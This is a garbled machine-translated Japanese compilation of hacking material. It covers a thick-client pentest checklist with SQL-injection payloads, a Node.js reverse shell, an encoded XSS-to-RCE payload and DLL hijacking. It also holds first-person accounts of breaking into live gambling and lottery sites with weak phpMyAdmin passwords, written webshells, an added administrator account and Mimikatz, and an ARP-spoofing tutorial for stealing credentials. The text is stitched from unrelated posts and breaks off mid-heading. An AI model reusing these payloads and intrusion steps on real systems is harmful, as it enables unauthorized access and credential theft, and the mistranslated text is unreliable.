1IEむンタヌネット蚭定ず接続-LAN蚭定。

2プロキシフィア - プロキシサヌバヌ/プロキシフィスルヌル

//HTTPのトラフィックをBurpsuiteず組み合わせるこずで、簡単にテストするこずができたすプロキシサヌバヌはプロキシアドレスに蚭定されたす。

1049983-20221108104634768-958814794.jpg 1049983-20221108104635462-1302757946.jpg 1049983-20221108104636140-1382229849.jpg

0x07テストポむント

0。 情報収集

コンピレヌション情報、開発環境/蚀語、䜿甚法プロトコル、デヌタベヌス、IP、難読化/暗号化、シェルなど。

ケヌス0-CFFクラむアント情報を衚瀺コンピレヌション環境など

DVTA

1049983-20221108104636932-933767068.jpg

1。リバヌス゚ンゞニアリング

逆コンパむル、゜ヌスコヌドリヌク、ハヌドコヌディングキヌ/パスワヌド、暗号化され、埩号化されたロゞック、圹割刀断ロゞック0-Admin、1-ノルマルヌザヌ、バックドアなど。

ケヌス0-暗号化ず埩号化ロゞックを取埗し、埩号化ツヌルを曞き蟌むための逆コンパむル

DVTA

1049983-20221108104637715-765430904.jpgこのロゞックず1049983-20221108104638416-2062982296.jpgの導入されたtext:ctsvjz0jqghxywbsrcpxpq==で埗られた情報

AES KEY:J8GLXC454O5TW2HEF7HAHCXPUFJ9V8K8

IV:FQ20T0GMNXA6G0L4

埩号化ツヌルを曞きたす

システムの䜿甚。 System.collections.genericを䜿甚しおいたす。 System.comPonentModelを䜿甚しおいたす。 System.Dataを䜿甚しおいたす。

System.drawingを䜿甚しおいたす。

System.linqを䜿甚しおいたす。

System.textを䜿甚しおいたす。

System.threading.tasksを䜿甚しおいたす。

system.windows.formsを䜿甚しおいたす。

System.security.cryptographyを䜿甚したす。

名前空間aesdecrypt

{

パブリック郚分クラスaesdecrypt :フォヌム

{

public aesdecrypt

{

initializeComponent;

}

private void decryptオブゞェクト送信者、eventargs e

{

string key="j8glxc454o5tw2hef7hahcxpufj9v8k8";

文字列iv="fq20t0gmnxa6g0l4";

string encryptedtext="ctsvjz0jqghxywbsrcpxpq==";

byte [] encryptedbytes=convert.frombase64stringencryptedText;

aescryptoserviceprovider aes=new aescryptoserviceprovider;

aes.blocksize=128;

aes.keysize=256;

aes.key=system.text.asciiencoding.ascii.getByteskey;

aes.iv=system.text.asciiencoding.ascii.getBytesiv;

aes.padding=paddingmode.pkcs7;

aes.mode=ciphermode.cbc;

icryptotransform crypto=aes.createdecryptoraes.key、aes.iv;

byte [] decryptedBytes=crypto.transformfinalblockencryptedbytes、0、encryptedbytes.length;

string decryptedstring=system.text.ascieencoding.ascii.getStringdecryptedbytes;

console.writeLine "\ n";

Console.WriteLine "############### Decryptデヌタベヌスパスワヌド############# \ n";

console.writeLine "Decrypted Database password:" + DecryptedString + "\ n";

console.writeLine "############## DONE ############### \ n";

}

}

}

//https://resources.infosecinstitute.com/damn-vulnerable-client-app-part-5/#articleから発信された埩号化コヌド

ケヌス1-コヌドロゞックを逆コンパむルしお倉曎しお、通垞のナヌザヌが管理者ずしおログむンできるように

DVTA

1-むザドミン

0-ノルマルサヌ

1を0に倉曎しお、管理者を決定したす

1049983-20221108104639124-63071411.jpg 1049983-20221108104639654-178729771.jpg

2。情報挏れ

プレヌンテキストに敏感な情報、機密ファむルむンストヌルディレクトリのxxx.configなど。

レゞストリRegshotを䜿甚しお、クラむアントの実行前埌のレゞストリの違いログむンなどを比范したす。

開発およびデバッグログリヌクDVTA.EXE LOG.TXTなど

プロセスハッカヌは、クラむアントメモリに単玔なテキストに敏感なデヌタアカりントパスワヌド/キヌなどを衚瀺したす。

文字列は、クラむアント文字列IP情報などを盎接衚瀺したす。

゜ヌスコヌドGithub、Giteeなどなどを衚瀺

ケヌス0コンフィ分率の機密情報挏れ

DVTA

1049983-20221108104640337-185140653.jpg

ケヌス1メモリヌリヌクデヌタベヌスアカりントパスワヌド

DVTA

1049983-20221108104641053-86634704.jpg

ケヌス2-゜ヌスコヌドには、ハヌドコヌディングされたFTPアカりントパスワヌドが含たれおいたす

DVTA

1049983-20221108104641808-1344115235.jpgケヌス3開発およびデバッグログリヌク

DVTA

1049983-20221108104642490-566933343.jpg

ケヌス4-特定のシステムにログむンした埌、アカりントパスワヌドをロヌカルに保存する1049983-20221108104643196-1110193214.jpg //

FTPなどのプロトコルによっおプレヌンテキストで送信されたアカりントパスワヌド

SQLステヌトメントプレヌンテキストトランスミッションコンストラクトむンゞェクション、過剰柔軟性などの䜿甚など

ケヌス0 -Zhengfang Academic Affairs System SQL Statement送信プレヌンテキスト、プレヌンテキストデヌタを返したす

1049983-20221108104643906-438017818.jpg 1049983-20221108104644569-294447733.jpg

//このケヌスはりヌナから来おいたす

ケヌス1-デヌタパケットは、特定のシステムログむンでデヌタベヌスアカりントパスワヌドを返したす

1049983-20221108104645325-238625889.jpg

3。トランスミッショントラフィック

4。その他の脆匱性

ケヌス0

1049983-20221108104646023-1455694132.jpg 1049983-20221108104646723-650031357.jpg :01010ログむン機胜など。

ケヌス0

1049983-20221108104647308-1028946722.jpg

ナヌザヌ名列挙

Admin 123456などを詊すこずができたす。

ブルヌトフォヌスの亀裂

匱いパスワヌド

ケヌス0

1049983-20221108104648098-1704429592.jpgケヌス1 1049983-20221108104648889-383046263.jpg :010ログむンの堎合、ナニバヌサルパスワヌド

xxx ’たたは「x」=’ x

xxx ’たたは1=1--

入力ボックスで、 '、'、 'などの閉じた゚ラヌを䜜成したす、'、100 ---などで泚文

デヌタは、ディスプレむビットたたぱラヌを䜿甚しお泚入されたす。原則はWebむンゞェクションず同じであり、異なるデヌタベヌスは類䌌しおいたす。

症䟋0オラクル泚入

'Union Select Null、null、dualの遞択ナヌザヌを遞択、null、null、sys.v_ $ hwore where rownum=1からselect banner=1、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null -

1049983-20221108104649612-1122024135.jpgケヌス1-MSSQL泚射

111 'およびナヌザヌを遞択0--

1049983-20221108104650282-856059893.jpg

個人的なクリアテキスト送信

Excelを゚クスポヌトする堎合は、1+1を入力しお、゚クスポヌト埌2かどうかを確認したす。

電子、nodewebkitなどの

sqlステヌトメントが公開されたした

ケヌス0-Chinese Ant Sword XSSからRCE

環境WIN7+PHPSTUDYPHP5.6.27-NTS+PERL+NC+ANTSWORD2.0.5

XSS WebShell

php

ヘッダヌ 'http/1.1 500 img src=onerror=alertx';

1049983-20221108104650932-527561671.jpgWindows+node.js:

成功

var net=require 'net'、sh=require 'child_process'。exec 'cmd.exe';

var client=new Net.Socket;

client.connect6677、 '127.0.0.1'、function{client.pipesh.stdin; sh.stdout.pipeclient;

sh.stderr.pipeclient;};

php

ヘッダヌ 'HTTP/1.1 500 NOT IMG SRC=ONERROR=' Evalnewバッファヌdmfyig5ldca9ihjlcxvpcmuoim5ldciplcbzaca9ihjlcxvpcmuoimnoawxkx3byb2nlc3miks 5Legvjkcjbwquzxhliik7cnzhcibjbgllbnqgpsbuzxcgbmv0llnvy2tldcgpowpjbgllbnquy29ubmvj dcg2njc3lcaimti3ljaumc4xiiwgznvuy3rpb24okxtjbgllbnqucglwzshzac5zdgrpbik7c2guc3rkb3 v0lnbpcguoy2xpzw50ktskc2guc3rkzxjylnbpcguoy2xpzw50ktt9kts=、base64.toString '';

1049983-20221108104651615-404403462.jpg関連するリファレンス

https://www.anquanke.com/post/id/176379

コマンド実行

ケヌス0-EverNoteWindowsクラむアント6.15ロヌカルファむルの読み取りずリモヌトコマンドの実行http://BLOG.KNOWNSSEC.COM/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AEB0-WINDOWS-E5%AE%A2%E6%88%B7%E7%ABATAF-ACAF-6-15-%% E6%A6 9cace59cb0e69687e4bbb6e8afbbe58f96e5928ce8bf9c

ケヌス1-AクラりドPCクラむアントコマンド実行マむニングプロセス

https://www.secpulse.com/archives/53852.html

ケヌス2-Kingsoft WPSメヌルメヌルクラむアントリモヌトコマンド実行の脆匱性MozillaベヌスのXULプログラム利甚のヒント

https://shuimugan.com/bug/view?bug_no=193117

テストポむントはWebず同じです。

dll hijacks linuxファむル怜玢泚文

珟圚のディレクトリパス泚文倀ディレクトリプログラム怜玢DLL泚文

//絶察パスは提䟛されおいたせん

1.アプリケヌションがロヌドされるディレクトリ。

2。珟圚のディレクトリ。

3。SystemDirectoryC: \ Windows \ System32 \。

4.16ビットシステムディレクトリ。

5。Windowsディレクトリ。

6。パス倉数のディレクトリ。

このプログラムは、攻撃者によっお配眮された悪意のあるDLLをロヌドできたす。

Procmonを䜿甚しお、プログラムによっおロヌドされたDLLを怜玢し、芋぀からない名前を芳察したす。

MSFは悪意のあるDLLを生成し、プログラムの読み蟌み堎所に配眮したす。プログラムを実行するず、ペむロヌドをトリガヌできたす。

ケヌス0-dllハむゞャック

DVTA

1049983-20221108104652298-1657972408.jpg 1049983-20221108104653027-338832542.jpg

SQL泚入

テストポむントはWebず同じです。

CSV泚入

レゞストリキヌ倀、承認サヌバヌは情報構築を返したす。

関連するリファレンス

https://cloud.tencent.com/developer/article/1430899

xss

ケヌス0 Zhengfang Academic Affairs Systemデヌタベヌスの任意の操䜜

IPを知るこずでデヌタベヌスを匕き継ぐこずができたす

HireHackking

1。原因

近幎䞭囜では、違法なほうれん草のギャンブルの症䟋がたくさんありたした。今回は、次の違法ほうれん草のりェブサむトにどのように䟵入したかを説明したす。この䟵入は玔粋に運ずりェブマスタヌの過倱であり、アリの巣に1000幎前の堀防の砎壊ず蚀えたす。読者の理解を確実にするために、䟵入者のアむデンティティはそれを文曞化するために特別に䜿甚されたす

2。スカりトず収集情報

タヌゲットサむトを開き、ほうれん草のWebサむトであるこずがわかり、情報の収集を開始したした。

囟片

ドメむン名の情報ク゚リは、ドメむン名がWesternDigitalから来おいるこずを孊びたした

囟片ここでは、WebmasterのPingツヌルを䜿甚しお、䜿甚されおいるCDNがあるかどうかを確認し、サヌバヌルヌムの堎所をク゚リしたす。 WHOISの結果から、DNS PODがDNS PODを䜿甚しおいるこずを孊びたしたが、それを経隓した人は、䞀般的な倧芏暡なIDCメヌカヌが独自のDNSを持っおいるこずを知っおいるので、゚ヌゞェントはDNS PODを䜿甚しおいたす

このドメむン名が゚ヌゞェントに登録されおいるこずは明らかです。私はもずもず゜ヌシャルワヌクドメむン名を準備したしたが、それは意味がありたせんでした。他の人は、それを解析した埌に戻っおきた埌も同じこずを䜿甚しおいたした。 F4therは、安党性のパルスをハむゞャックするのはハニヌポットず釣りであるず蚀う前に蚘事を曞きたした。しかし、それはあたりにも面倒で、それをスキップしお盎接浞透させるだけです。

囟片

URLがHome/Change/Alipayinfo/Alipay/Wechat.htmlであるこずがわかりたした。私の最初の予想は、ThinkPhpフレヌムワヌクを䜿甚しお曞かれたプログラムです。

囟片

私の掚枬を確認するために、私は特別にアドレスを入力しお、それが゚ラヌを報告したかどうかを確認したした。䞀般に、ThinkPhpに゚ラヌを報告するずきにバヌゞョン +物理パスが衚瀺されたす。その結果、写真のポむントを芋るず、次の情報を入手できたす。

1.このサむトでは、ThinkPhp3.2.2フレヌムワヌクを䜿甚しおいたす。

2。物理的な力C: \ www \ pcdd \ pc

3.このりェブサむトはCDNを䜿甚しおいたせん

4.このりェブサむトサヌバヌは海倖カナダです。

5.このりェブサむトには抜け穎が必芁です。

囟片

3。戊いを開始

盎接SQLMAPテストを芋぀けたしたが、結果は次のずおりです。それは保護され、壁で盎接ブロックされおいるため、継続が䞍可胜になりたす。 VPNに接続したす

囟片

もう䞀床芋お、それを保護する方法が芋぀からない堎合は、Ping IP 47.xx.xx.xxに盎接アクセスしお、phpstudyプロヌブを芋぀けたす

囟片

phpstudyでは、デフォルトのデヌタベヌスパスワヌドはrootであるため、匱いパスワヌドを詊し始めたす

囟片

圌はパスワヌドが匱いこずがわかりたした。だから私は47.xx.xx.xx/phpmyadminを蚪問しおいたす。残念ながら、それは再び壁に囲たれたした。぀たり、このファむアりォヌルは少し無駄です。ノヌドを倉曎しお、盎接ログむンしたす。

囟片

その埌、SQLステヌトメントを䜿甚しお、テン文を゚クスポヌトし、ログむンしおSQLをクリックしおから、ステヌトメントを実行したす

'php @eval$ _ post [1]'を遞択したすinto outfile 'c: \/www \/pcdd \/pc \ /log1.php';

ここでダブルスラッシュを䜿甚し、1぀のスラッシュを䜿甚する目的は、スラッシュを盎接解析できないこずを恐れるこずであり、SQLステヌトメントを実行するために再びブロックされたす。

その埌、包䞁を盎接䜿甚しおノヌドを倉曎したした。 SQLステヌトメントを実行したため、ブロックされおいる必芁があるため、ノヌドを盎接倉曎したした。

囟片この時点で、シェル内のディレクトリをめくるこずを忘れないでください。壁の100のノヌドは、あなたがひっくり返すのに十分ではありたせん。ステヌトメントを盎接実行しお圓局を増やし、サヌバヌに接続できたす。ここのりェブマスタヌは脆匱性を修正し、トロむの朚銬は自然に存圚しなくなり、再珟できたせん。ただし、りェブマスタヌは私のアカりントを削陀したせんでした。

囟片は、Alibaba CloudのRDSデヌタベヌスを䜿甚しおいるこずを発芋し、パスワヌドは非垞に耇雑です。

iv。芁玄

1。圌のWebサむトでは、クラりドデヌタベヌスサむトデヌタベヌス分離を䜿甚しおいたす。第䞀に、より安党であり、第二に、デヌタを凊理する方が良いですが、ロヌカル環境デヌタベヌスの匱いパスワヌドを無芖するため、䟵略されたす。 2。情報収集など、詳现は本圓に重芁です。倚くの人々が長い間タヌゲットステヌションを芋぀めおおり、䜕も埗おいたせん。珟時点では、窓ず背䞭のドアを芋るこずもできたす。この蚘事では、IPに盎接アクセスし、環境構成ずプロヌブを発芋したす。そうしおはじめお、あなたはずおもスムヌズに入るこずができたす。 3.基本は非垞に重芁です。たずえば、PHPStudy環境のデフォルトのパスワヌドずデフォルトアドレスはわかりたせん。 phpstudyのデフォルトパスワヌドが他のものである堎合はどうなりたすかデフォルトの暩限がSystem4であるこずはわかりたせん。物事をするずきは泚意しおください。ワヌクロヌドを最小限に抑える必芁がありたす。たずえば、SQLステヌトメントを実行する堎合、PHPMyAdminがC:WWたたは䜕かに解析される可胜性が非垞に高いため、テストするたびにダブルスラッシュバックスラッシュをもたらすこずが最善です。たずえば、ディレクトリをフリップしたい堎合は、間違いなく壁に囲たれたす。ノヌドを倉曎するために少なくずも1分間無駄になりたす。パブリックテストを行った友人は、パブリックテストが時間に察しお競い合っおいるこずを知っおいたす。そのため、この堎合、ファむアりォヌルのために圓局を盎接提起したした。 5.独自のWebサむトを構築するずきは怠zyにしないでください。すべおの蚱可を完璧にし、ハッキングされるリスクを最小限に抑えたす。

元のリンクから転茉https://mp.weixin.qq.com/s/3y894ht1ubbgdifbitoqzq

HireHackking

phpmyAdminの匱いパスワヌドを取埗したす

宝くじサむトのIPは情報を介しおxxxであり、怜出スキャンはphpmyadminが存圚するこずを明らかにしたす。掚枬を通じお、デフォルトの匱いパスワヌドroot/rootを䜿甚しお、phpmyAdminにログむンしたす。

囟片

囟片

PHPMyAdminバックグラりンドSQLク゚リを介しおファむルをログに蚘録するシェルを曞き蟌む

phpmyAdminのSQLク゚リ関数を䜿甚しお、ログファむルにTrojanを文章を曞き蟌みたす。

プロセスずコマンドは次のように:です

1。ログ機胜をオンにしたすGlobal general_log=onを蚭定したす。

2。phpmyadmin倉数をクリックしお、ログファむル名:を衚瀺したす

囟片

ここのログファむルはtest.phpです。

3。sqlコマンドを実行し、ログファむルに文を曞きたす: 'php assert$ _ post [' test '];';

囟片

4。実行が成功した埌に戻りたす。

囟片

5.ログファむルを衚瀺したす。

囟片

6.包䞁を接続しおナヌザヌを远加し、Mimikatzをアップロヌドしたす。

包皮ナむフを䜿甚しおログファむルに接続するトロむの朚銬、xxx/test.phpパスワヌド:test

囟片

システム管理者システムの蚱可であるこずを確認しお確認したす。ナヌザヌを远加しお管理グルヌプに远加しおください。

コマンドは: C: \ windows \ system32 \ net.exeナヌザヌテストテスト@123 /addです

c: \ windows \ system32 \ net.exeロヌカルグルヌプ管理者テスト /远加

Mimikatazをサヌバヌにアップロヌドしたす。

囟片

7。3389接続ず管理者のパスワヌドを読み取りたす。

1盎接的なTelnet IP 3389テストではアクセス可胜であるこずがわかりたした。そのため、3389を盎接接続しお入力したした。

囟片

2たたは、次のコマンドがここの包䞁で実行され、3389たでにポヌトを開くずク゚リをしたす。

ステップ1 :タスクリスト /SVC | findstr termerviceリモヌトデスクトップサヌビスのプロセスをク゚リしたす

ステップ2 : Netstat -Ano | FindStr **** //リモヌトデスクトップサヌビスプロセス番号に察応するポヌト番号を確認したす。

3Mimikatzを実行し、管理者グルヌプのログむンパスワヌドを読み取りたす。

囟片

4取埗した管理者/xxxxアカりントパスワヌドを䜿甚しお、リモヌトでサヌバヌにログむンしたす。

囟片

サヌバヌは、phpMyStudyを䜿甚しおバッチに宝くじステヌションを建蚭するこずがわかっおいたした。玄12個のサむトがあり、いく぀かのサヌバヌ䞊のWebサむトドメむン名に自由にアクセスできたす。䞀郚のスクリヌンショットは次のように:です

システム1 :

囟片

システム2 :

囟片

システム:

囟片

舞台裏1 :

囟片

舞台裏2 :

囟片

元のリンクから転茉 https://mp.weixin.qqq.com/s?__biz=mzg2ndywmda1na==mid=2247487003IDX=1SN=5C85B34CE6FFB400FDF858737E34DF3DCHK SM=CE67A482F9102D9405E838F34479DC8D1C6B793D3B6D4F40D9B3CEC9CC87F1455555555CB3DDCCENE=21WECHAT_REDIRECT

https://blog.csdn.net/weixin_39997829/article/details/109186917

HireHackking

arp攻撃

契玄の玹介

ARPのフルネヌムはアドレス解像床プロトコルであり、アドレス解像床プロトコルです。 IPアドレスに基づいお物理アドレスを取埗するのは、TCP/IPプロトコルです。ホストが情報を送信するず、タヌゲットIPアドレスを含むARP芁求をネットワヌク䞊のすべおのホストにブロヌドキャストし、タヌゲットの物理アドレスを決定するための返品メッセヌゞを受信したす。返品メッセヌゞを受信した埌、IPアドレスず物理アドレスはネむティブARPキャッシュに保存され、䞀定期間予玄されたす。 ARPキャッシュは、リ゜ヌスを保存するために次にリク゚ストしたずきに盎接照䌚されたす。

ARPアドレス解像床プロトコルは、ネットワヌク内のさたざたなホスト間の盞互信頌に基づいおいたす。ネットワヌク䞊のホストは、ARP応答メッセヌゞを個別に送信できたす。他のホストが返信メッセヌゞを受信した堎合、メッセヌゞの信頌性を怜出せず、ネむティブARPキャッシュに蚘録したす。したがっお、攻撃者は特定のホストに擬䌌ARP返信メッセヌゞを送信するこずができたす。そのため、送信する情報は、ARPのスプヌフィングを構成する予想ホストたたは間違ったホストに到達できたせん。

動䜜原理

環境の仮定

ホストA

IPアドレス192.168.1.1MACアドレス0A-11-22-33-44-01HOST B

IPアドレス192.168.1.2MACアドレス0A-11-22-33-44-02

ワヌクフロヌ

ステップ1ホストAのルヌティングテヌブルコンテンツによるず、ホストBにアクセスするために䜿甚されるフォワヌディングIPアドレスが192.168.1.2であるず刀断し、ホストAはロヌカルARP CACHのホストBの䞀臎MACアドレスをチェックしたす。ステップ2ホストAがARPキャッシュにマッピングが芋぀からない堎合、192.168.1.2のハヌドりェアアドレスに尋ねるため、ARPリク゚ストフレヌムが拡倧したす。ロヌカルネットワヌク䞊のすべおのホストに再生するず、゜ヌスホストAのIPアドレスずMACアドレスがARPリク゚ストに含たれおいたす。ロヌカルネットワヌク䞊の各ホストはARP芁求を受信し、独自のIPアドレスず䞀臎するかどうかを確認したす。ホストが、芁求されたIPアドレスが独自のIPアドレスず䞀臎しないこずを発芋した堎合、ARPリク゚ストを砎棄したす。ステップ3ホストBは、ARP芁求のIPアドレスが独自のIPアドレスず䞀臎し、ホストAのIPアドレスずMACの䜍眮がロヌカルARPキャッシュに远加されるこずを決定したす。ステップ4ホストBは、MACアドレスを含むARP応答メッセヌゞをホストAに盎接戻したす。ステップ5ホストAがホストBから送信されたARP応答メッセヌゞを受信するず、ホストBのIPおよびMACアドレスマッピングでARPキャッシュを曎新したす。ロヌカルキャッシュには生涯がありたす。寿呜が終了するず、䞊蚘のプロセスが再び繰り返されたす。ホストBのMACアドレスが決定されるず、ホストAはIP通信をホストBに送信できたす。

キャッシュメカニズム

ARPキャッシュは、IPアドレスずMacアドレスを保存するために䜿甚されるバッファヌです。その゚ッセンスは、IPアドレス-MACアドレスの察応するテヌブルです。テヌブル内の各゚ントリは、ネットワヌク䞊の他のホストのIPアドレスず察応するMACアドレスを蚘録したす。各むヌサネットたたはトヌクンリングネットワヌクアダプタヌには、独自のテヌブルがありたす。アドレス解像床プロトコルが既知のIPアドレスノヌドのMACアドレスに぀いお尋ねられるず、最初にARPキャッシュで衚瀺されたす。存圚する堎合、察応するMacアドレスを盎接返したす。存圚しない堎合は、LANを照䌚するARPリク゚ストを送信したす。ブロヌドキャストボリュヌムを最小限に抑えるために、ARPは将来の䜿甚のためにMACアドレスマッピングぞのIPアドレスのキャッシュを維持したす。

ARPキャッシュには、動的および静的プロゞェクトを含めるこずができたす。動的プロゞェクトは自動的に远加され、時間ずずもに削陀されたす。各動的ARPキャッシュアむテムの朜圚的なラむフサむクルは10分です。新しく远加されたアむテムはタむムスタンプされおいたす。プロゞェクトが远加されおから2分以内に䜿甚されない堎合、プロゞェクトは有効期限が切れ、ARPキャッシュから削陀されたす。プロゞェクトがすでに䜿甚されおいる堎合、さらに2分間のラむフサむクルが受信されたす。プロゞェクトが垞に䜿甚されおいる堎合、10分の最長のラむフサむクルたでさらに2分間のラむフサむクルが受信されたす。静的プロゞェクトは、コンピュヌタヌが再起動されるたでキャッシュに残りたす。

arpスプヌフィング

ARPアドレス解決プロトコルは、ネットワヌク内のさたざたなホスト間の盞互信頌に基づいおいたす。その誕生により、ネットワヌクはより効率的に実行されたすが、欠陥もありたす。 ARPアドレス倉換テヌブルは、コンピュヌタヌのキャッシュメモリの動的な曎新に䟝存し、キャッシュメモリの曎新は曎新サむクルによっお制限され、最近䜿甚されたアドレスのマッピング関係テヌブル゚ントリのみが保存されたす。これにより、攻撃者は、キャッシュメモリがテヌブル゚ントリを曎新しお攻撃を実珟する前に、アドレス倉換テヌブルを倉曎する機䌚を䞎えたす。

ARPリク゚ストはブロヌドキャストフォヌムで送信されたす。ネットワヌク䞊のホストは、ARP応答メッセヌゞを個別に送信できたす。他のホストが返信メッセヌゞを受け取ったずき、メッセヌゞの信ity性を怜出し、ロヌカルMACアドレス翻蚳テヌブルに蚘録したせん。このようにしお、攻撃者はタヌゲットホストに擬䌌ARP応答メッセヌゞを送信し、それによりロヌカルMACアドレステヌブルを改ざんしたす。 ARPのスプヌフィングにより、タヌゲットコンピュヌタヌがゲヌトりェむず通信できなくなる可胜性があり、通信のリダむレクトにも぀ながりたす。すべおのデヌタは攻撃者のマシンに枡されたす。攻撃者は、タヌゲットずゲヌトりェむの間でデヌタを転送したす。これは、タヌゲットの通垞のむンタヌネットアクセスに圱響を䞎えるこずなくタヌゲットを聎く目的を達成するために、「仲介者」ずしお䜿甚できたす。

欺ceptionの実践

基本環境

攻撃ホスト192.168.174.129 00:0C:29:39:BE:EB正垞ホスト192.168.174.170 00:0C:29336008:AD:EBゲヌトりェむアドレス192.168.174.2

切断攻撃

ステップ1攻撃ホストのポヌト転送を閉じる

終了

echo 0/proc/sys/net/ipv4/ip_forward

蚱可する

Echo 1/proc/sys/net/ipv4/ip_forward

1049983-20230129140559574-267061974.jpg

ステップ2通垞のホストで珟圚のARP解像床リストを衚瀺したす

1049983-20230129140600284-753195515.jpg

ステップ3通垞のホストでバむドゥにピン留めしたす

ping www.baidu.com -T

1049983-20230129140600986-1420595615.jpg

通垞、Baiduにアクセスできたす。

1049983-20230129140601711-377836780.jpg

ステップ4次に、ネットワヌクは攻撃ホストのAprspoofによっお切り取られたす

usage: arpspoof [-i interface] [-c own | host | blos] [-t target] [-r] host

パラメヌタヌ説明

- 䜿甚するむンタヌフェむスを指定したす

-C ARP構成を埩元するずきに䜿甚されるMACアドレスを指定したす。デフォルトは元のMacを䜿甚するこずです぀たり、ARPSPOOFコマンドを停止した埌、デフォルトで脱着したす

-t毒されるホストを指定したす。指定されおいない堎合、LANの䞋のすべおのホストにデフォルトです

-R双方向䞭毒宿䞻ずタヌゲット、したがっおデヌタの双方向キャプチャ-Tが同時に指定されおいる堎合にのみ有効

#executionの䟋

arpspoof -i eth0 -t 192.168.174.170 192.168.174.2

1049983-20230129140602635-1232145428.jpg

ステップ5Pingリク゚ストがタむムアりトし、ブラりザがwww.baidu.comを開くこずができないこずがわかりたす。同時に、ARP解像床テヌブルをチェックするず、ゲヌトりェむのMACアドレスが正垞にスプヌフィングされ、攻撃者のMACアドレスに蚭定されおいるこずがわかりたす。

1049983-20230129140603363-1270054129.jpgstep 6その埌、攻撃が䞭断されたした以前に-cパラメヌタヌを指定しなかったため、元のMacアドレスが埩元されたす1049983-20230129140604067-1512025892.jpg

pingが通垞に戻り、ペヌゞずARPテヌブルも通垞に戻るこずがわかりたす

1049983-20230129140604705-349404777.jpg

画像デヌタ

ステップ1ポヌト転送をオンにし、マシンがルヌタヌのようなデヌタ情報を転送できるようにしたす

Echo 1/proc/sys/net/ipv4/ip_forward

1049983-20230129140605296-780391879.jpg

ステップ2通垞のホストで珟圚のARP解像床リストを衚瀺したす

1049983-20230129140605937-5170927.jpg

ステップ3通垞のホストでWebペヌゞにアクセスする

1049983-20230129140606648-1919331429.jpg

usage: arpspoof [-i interface] [-c own | host | blos] [-t target] [-r] host

パラメヌタヌ説明

- 䜿甚するむンタヌフェむスを指定したす

-C ARP構成を埩元するずきに䜿甚されるMACアドレスを指定したす。デフォルトは元のMacを䜿甚するこずです぀たり、ARPSPOOFコマンドを停止した埌、デフォルトで脱着したす

-t毒されるホストを指定したす。指定されおいない堎合、LANの䞋のすべおのホストにデフォルトです

-R双方向䞭毒宿䞻ずタヌゲット、したがっおデヌタの双方向キャプチャ-Tが同時に指定されおいる堎合にのみ有効

#executionの䟋

arpspoof -i eth0 -t 192.168.174.170 192.168.174.2

1049983-20230129140607359-1535379602.jpg

ステップ5その埌、DriftNetはWebサむトにアクセスする際に被害者ナヌザヌの残存画像デヌタ情報を取埗したす

1049983-20230129140608085-1225498038.jpg 1049983-20230129140608818-1299779077.jpg 1049983-20230129140609542-1723239514.jpg

ログむン資栌情報

ステップ1ここでは、䞊蚘の画像デヌタパヌツを拡匵し続けたす。EtterCapを䜿甚しお攻撃ホストの通信デヌタをキャプチャしたす

eTtercap -tq -i eth0

1049983-20230129140610245-861224181.jpg

ステップ2サヌドパヌティFTPサヌビスをシミュレヌトしたす

1049983-20230129140610921-563578121.jpg

ステップ3ナヌザヌはサヌドパヌティのFTPサヌビスにアクセスし、認蚌したす

1049983-20230129140611552-869109915.png

ステップ4攻撃者はナヌザヌのアカりントパスワヌド情報を正垞にキャプチャしたす

1049983-20230129140612222-670821545.jpg

スプヌフィング拡匵機胜

ここでは、いく぀かの䞀般的に䜿甚されるARPスプヌフィング方法ずWindowsでのARPスプヌフィングツヌルの䜿甚を远加したす〜

netfuke

3

テスト環境

タヌゲットホスト192.168.174.170勝利7攻撃ホスト192.168.174.169Windows Server 2003ゲヌトりェむアドレス192.168.174.2

欺ceptionプロセス

ステップ1ネットフェットの実行䞭のホストの実行ず、ネットフェの実行を担圓したす。 ARPスプヌフィングは実行できたせん

1049983-20230129140612974-455784759.png

ステップ2ARPスプヌフィングの構成

1049983-20230129140613650-1836780355.png

ステップ3プラグむンコマンドパラメヌタヌ蚭定

1049983-20230129140614397-2145380496.jpg

ステップ4ARPスプヌフィングをオンにしたす

1049983-20230129140615228-1163122555.png

攻撃怜出

XARPツヌルの玹介

XARPは、海倖で人気のあるARPファむアりォヌル゜フトりェアです。ナヌザヌが特別な怜出システムを確立し、高床なテクノロゞヌを䜿甚しお、ネットワヌク䞊のさたざたなARP攻撃を怜出および凊理するのに圹立ちたす。たずえば、ARPスプヌフィングを䜿甚しお、攻撃者は、電子メヌルやパスワヌドなど、すべおのネットワヌクトラフィックを盗聎できたす。これはすべお発芋されおいたせん。 XARPは、このような攻撃を怜出するためのアクティブおよびパッシブ方法を実行したす。

攻撃怜出

ステップ1NetFukeをオンにしおARPスプヌフィング攻撃を実装する

1049983-20230129140615902-1963725991.png

ステップ2次に、XARP偎はアラヌム情報ず関連する蚘録情報を芋るこずができたす

1049983-20230129140616614-1756824487.jpg

ps:私は個人的にこのツヌルがそれほど良くないず感じおいたす〜

防埡枬定

ARP詐欺の防衛方法は、䞻に次の2぀の偎面から始たりたす。

a。鍛造デヌタパケットの䌝播をブロックしたす。

この方法は、䞻にスむッチやルヌタヌなどのネットワヌクデバむスの芳点から始たりたす。スむッチを䟋にずるず、スむッチのポヌト、MACアドレス、IPアドレスにバむンドしお、DAI動的ARP怜査怜出テヌブルを生成したす。特定のポヌトのホストがDAIテヌブルの゚ントリず䞀臎しないデヌタパケットを送信した堎合、ネットワヌクを切断するか、送信するデヌタパケットを砎棄するこずを遞択できたす。

b。被害者は停のデヌタパケットを受け入れたせん

この方法は、䞻にナヌザヌの芳点から始たりたす。たず、なじみのないネットワヌクにアクセスしないこずは確かです。第二に、ナヌザヌはデバむスにARPファむアりォヌルをむンストヌルできたす。技術者である堎合、静的ARP゚ントリを確立するこずを遞択できたす頻繁に倉化しないネットワヌク環境に適しおおり、少数が少ない。 windonwdeナヌザヌはコマンド 'arp -s ip'アドレスMacアドレスを䜿甚しお静的バむンディングを実行したす

dns攻撃

ドメむン名システム

